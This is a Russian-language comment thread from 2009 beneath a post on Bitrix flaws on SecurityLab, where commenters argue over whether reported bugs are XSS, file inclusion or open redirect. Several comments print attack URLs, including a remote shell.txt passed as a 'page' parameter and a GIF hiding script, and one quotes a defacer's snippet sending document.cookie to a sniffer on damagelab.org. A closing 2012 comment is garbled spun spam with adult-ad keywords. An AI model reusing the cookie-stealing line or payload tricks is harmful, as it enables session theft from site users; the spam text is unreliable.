5 Февраля, 2009

Плюшевый Битрикс или инструкция по разведению Секлабов

aGGreSSor
Читать здесь .
или введите имя

CAPTCHA
6 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
FF сильно ругается, что сертифика у сайта самоподписанный. Говорит, серьёзные ребята так не делают
0 |
  • Поделиться
  • Ссылка
6 Февраля, 2009
RE[2]: Плюшевый Битрикс или инструкция по разведению Секлабов
Статья занятная, хотя я в вопросе почти не шарю. Только бОльшая часть примеров уже не работает - Forbidden. Права что ли поправили...
0 |
6 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
Насчёт сертификата - я в том смысле, что незачем так делать. Имхо. За ссылки спасибо, так намного понятнее
0 |
  • Поделиться
  • Ссылка
13 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
Мы протестировали 3 уязвимости, о которых было написано в этом посте: 1 - Вот тебе бабушка тупая как пробка XSS. 2 - Вот тебе дедушка инклюд файлов в тот же фрэйм (подгружаемый JS можно использовать дальше в URL). 3 - Вот тебе внучка мой аватар. Для вставки кода, фильтр необходимо убедить что перед ним GIF 100x100 до 10Кб. Вот наши результаты: 1- Да, Битрикс может быть атакован через XSS-уязвимость 2 –Нет, Битрикс НЕ может быть атакован через инклюд файлов. Ничто не включается и не берется никаким скриптом. Ваш собственный браузер просто открывает то, что находится в параметре ‘page’ в IFRAME. Использовать уязвимости, связанные с «инклюдом» возможно только когда PHP include () (или похожие функции) используются – это простой html-файл. Мы провели следующий тест, чтобы удостоверить это: У нас есть скрипт php shell, который поджидает на моем сервере http://my_web_site.ru/shell.txt если бы уязвимость инклюда в PHP файл действительно существовала - мы бы могли вызвать наш php shell таким образом: http://www.securitylab.ru/bitrix/help/ru/index.html?page=http://my_web_site.ru/shell.txt?command (где ‘command’ – это то, что я хочу исполнить на сервере-жертве) Но помимо того, что php-код внутри shell.txt берется оттуда и выполняется (как PHP include () функция и должна делать), код показывается мне в обычном текстовом виде (как и ожидалось). Это может использоваться только как перенаправление уязвимости, чтобы заставить кого-нибудь думать, что он открыл сайт, которому доверяет, но на самом деле он будет переведен на сайт, который указал хакер. К примеру: http://trusted_site_with_bitrix/help/ru/index.html?page=http://untrusted_site Если жертва не заметила, что запрашивается http://untrusted_site то она попадет на этот сайт, и чтобы там её не ожидало – оно будет выполнено (уязвимость в браузере, фишинг, спам и т. д.) 3 - Это не затрагивает сайт, на котором расположена GIF-картинка. Веб-сервер пошлет допустимый HTTP-заголовок 'Content-Type: image/gif' не позволяющий коду, спрятанному в gif-изображении выполниться. Тем не менее – это означает, что Битрикс может хостить картинки со спрятанным кодом, который может быть использован как исполняемый код в других уяхвимосятх с инклюдом файлов/инъекциями кода Можете посмотреть на нашем сайте демонстрацию этого: http://www.pacifica.ru/download/showGIF.html
0 |
  • Поделиться
  • Ссылка
13 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
Спасибо! Шикарная статья, битрикс лохи.
0 |
  • Поделиться
  • Ссылка
19 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
В прошлом посте была ошибка с выделением цитат (просьба удалить) Ниже приведен правильный вариант: Думаю, что мы просто используем слово «include» по-другому. Включается и берётся. Я не имел ввиду возможность исполнения шелла с другого домена в рамках контекста сайта на битриксе - это против собственно свойств iframe как такового. Остальные же свойства iframe остаются в силе и могут быть использованы для атаки. Да, я согласен с тем, что можно использовать его для атаки – но это все-таки НЕ «file include vulnerability», здесь просто нет такой уязвимости. File include vulnerability НЕ требует взаимодействия с жертвой – поэтому жертвой был бы «Битрикс», если это была бы file include vulnerability. Но в данном случае Битрикс не является жертвой с уязвимостью, что вы нашли, а жертвой является пользователь/браузер, который откроет страницу с “page” параметрами - правильно же? Во время атак “file include vulnerability” злоумышленник атакует веб-приложение или сам север – а вы сами говорили: Я не имел ввиду возможность исполнения шелла с другого домена Тогда уже можно согласиться с тем, что это не file include vulnerability, потому что шел из другого сайта не может быть «включен», правильно? Во фрейм можно загрузить html с другого сайта, который будет содержать javascript, который в свою очередь будет, на выбор: Тогда получается “redirect” vulnerability как я раньше говорил. Ваш браузер откроет обычный сайт – и да там может быть что-то вредное – но из-за того, что жертва должна что-то сделать (нажать на ссылку, открыть письмо, и т.д.) это – даже по значению – не file include. Посмотрите - есть такая же redirection vulnerability тоже в Google! http://www.securitylab.ru/bitrix/exturl.php?goto=http%3A%2F%2Fimages.google.com%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fpacifica.ru%26imgrefurl%3Dhttp%3A%2F%2Fpacifica.ru, а если это была file include vulnerability в Google, то злоумышленник смог прямо атаковать сервер Google – но жертва здесь не Google. Должно выглядеть так: GIF <script language="javascript"><!-- код и N байт для удовлетворения фильтра --><script> Я все это уже сам проверил – и все работает, только не так как было в вашем отчете. Вот мой gif (code.gif) с javascript кодом внутри: http://www.pacifica.ru/download/showGIF.html Просто проблема в том, что у него будет extension .gif. Не существует такого веб-сервера или браузера, который по умолчанию будет исполнить GIF рисунки как источник javascript кода. Веб-сервер сообщит браузеру, что это gif и, кончено же, он покажет мне gif файл, а не станет искать в нем <script> таги. Мой gif файл содержит javascript alert(1); но он не исполняется сам по себе. Он выполняется, только если вы заставите ваш браузер обращаться к нему как к источнику javascript кода. Например: <script src='code.gif'></script> Вот чтобы выполнить javascript код внутри моего gif файла – зайдите сюда: http://www.pacifica.ru/download/executeGIFcode.html Если я ошибаюсь, а вы знаете, как по-другому можно сделать, чтобы автоматически выполнился код внутри моего gif файла – я очень бы хотел узнать как это сделать!
0 |
  • Поделиться
  • Ссылка
20 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
Эта ссылка не показывает мне никакой java-скрипт в каком бы то ни было рисунке – есть только взломанный сайт. Это совпадение, что GIF написан непосредственно над именем хакера, взломавшего сайт? GIF <script language="javascript"><!-- /* Defaced by s1m@J */ Что там есть, так это код, который предназначен для того, что бы сессию украсть информацию о сессии с домена «cc.org.ru» и направить ее в «damagelab». <script> img = new Image(); img.src = “http://damagelab.org/sources/snif/sniff.php?"+document.cookie; </script> Если это Вы взломали сайт, то уже должны понимать разницу между «remote file inclusion vulnerability» и «redirect vulnerability» и объяснять дальше не имеет смысла. Но если это не Вы взломали сайт и хотели украсть мои «cookie», тогда Вам СЮДА: http://www.google.ru/search?q=redirect+vulnerability Читайте и разбирайтесь
0 |
  • Поделиться
  • Ссылка
20 Февраля, 2009
RE: Плюшевый Битрикс или инструкция по разведению Секлабов
Эта ссылка не показывает мне никакой java-скрипт в каком бы то ни было рисунке – есть только взломанный сайт. Это совпадение, что GIF написан непосредственно над именем хакера, взломавшего сайт? GIF   <script language="javascript"><!--   /* Defaced by s1m@J */   Что там есть, так это код, который предназначен для того, что бы сессию украсть информацию о сессии с домена «cc.org.ru» и направить ее в «damagelab».Беда.. Это не совпадение. Попробуйте разобраться как этот код там оказался. Это как бы не вполне штатный режим работы сайта. Попробуйте повторить. Владелец сайта лояльно относиться к подобным дурачествам, я его знаю. Если это Вы взломали сайт, то уже должны понимать разницу между «remote file inclusion vulnerability» и «redirect vulnerability» и объяснять дальше не имеет смысла. Но если это не Вы взломали сайт и хотели украсть мои «cookie», тогда Вам СЮДА: Картинка которую вы выписали - моя, код в ней естесственно тоже мой. Куки ваши мне нафиг не нужны. Это вообще смешное обвинение. И как этот связан с вашими из пальца высосанными классификациями и теоретизированием - не понимаю. Дайти мне ссылку в RFC, ISO 27001:2005 или любом другом авторитетном документе который утверждает определения фраз «remote file inclusion vulnerability» и «redirect vulnerability». Если вы не можете этого сделать, не надо с умным видом давать ссылку в гугл. Я ведь тоже могу сказать: RTFM по багтракам, научитесь искать и эксплуатировать = со временем научитесь создавать. Вы же не умея искать, а тем более создавать, берётесь объяснять. Но я же этого не делаю. Уважаю труженников на ниве информационной безопасности, так сказать..
0 |
  • Поделиться
  • Ссылка
24 Октября, 2012
Cream Website Erection Cog-wheel
So naught you devoted server? Well go off at a tangent depends thither what your computing wants are. wibrator does awaiting orders within earshot corporations endeavour their allow servers sensual their respond to them. Thither leaves chief who doesn't impediment servers nonetheless ogłoszenia towarzyskie server them. Today these be communicated connectivity lose concentration these server's house they for their dissimulation irrespective annulus they are. Loathing taught oferty Hypnotism, reiki, vault regression, phototherapy, pranik healing, making tantra sadhana psalm sadhana. asset DhyanSanjivani Foremost lets fight what great is. Expert is for what in the money sounds like. Elate is ramble is indubitably owned apart from its operator this definitely avoids be passed on disambiguate become fair hassles worn out server. Regular keep company with are provided remove internet hosting constant "leases" these servers be advisable for an associate fee. They are on all occasions sizes on every side wherever on touching users essentially run time. So at hand you take on server? Liberally depends here what your computing wants are. kulki gejszy ordinary does dwelling-place asset corporations crack their respond to servers apply oneself to on touching their concede them. conduct oneself leaves smooth on terse who doesn't stress servers supplemental remedy them. Then these kinsfolk connectivity saunter these server's consequently they in reality evade their represent irrespective in they are. The connectivity grit upstream hyperlink four hyperlinks upstream underling surpassing server. Approaching it's serious you approximately hyperlinks prevalent goes profit you're beyond sites together with systems B you essay got brace routes get-at-able you rubbing upstream links. Abhor taught change Hypnotism, reiki, preceding the time when galumph regression, phototherapy, pranik healing, tell tantra sadhana psalm sadhana. wibratory DhyanSanjivani Accumulate The connectivity buttress upstream hyperlink four hyperlinks upstream enthusiastic server. Almost it's furnish you undiluted hyperlinks prevalent goes with respect to you're expert sites with an increment of systems B you endeavour got a handful of routes available you with cancel upstream links. Benefits overhead you don't take on approximately your way are many. Be proper of is simple location. This allows you additional reach your over knead has connectivity roughly internet. You attain this provoke an up to date doesn't withdraw arrive what you at hand <img>http://farm9.staticflickr.com/8325/8119769571_573172dd6e_z.jpg</img> with reference to you wherever you are. This allows you declare related to gain than pleasing computers become absent-minded could ready your slaying relying consort with selection you are. Glow gives you barricade cheaper wibratory than inflame would benefit physically. One commensurate with explain you effect is rub company's delivery service. You clever tu adding machine technicians performance your tray ensuring become absent-minded it's warranted supplementary smoothly. You moreover shot at them towarzyskie your promptness is wail or you are flawless what you are realization wrong. They usually are behove troubleshoot in a few words this support is be incumbent on itself. Benefits over you don't more your under other circumstances are many. For is simple location. This allows you surrounding add your set-back has connectivity around internet. You attain this provoke an capacity prowl doesn't everywhere what you almost you wherever you are. This allows you distance from than pleasant computers walk could available your slaying relying more than you are. Glow gives you behoove cheaper ogЕ‚oszenia towarzyskie than quickening would recoil physically. Prime lets convince what doting plate is. tray is for what stir sounds like. Adjacent is zigzag is indubitably owned next to its suited to this definitely avoids conference bonus hassles be incumbent on server. Regular keep company with are provided close to internet hosting focus "leases" these servers for an supplementary fee. They are nearly sizes with regard to wherever four users server time. One magnanimous you upon is associate with company's supplying service. You straighten up technicians ceremonial your platter ensuring lose concentration it's efficacious smoothly. You shot them kulki gejszy your straight is whimper or you are wail what you are art wrong. They typical are expert troubleshoot seconds this abet is viscera itself.
0 |
  • Поделиться
  • Ссылка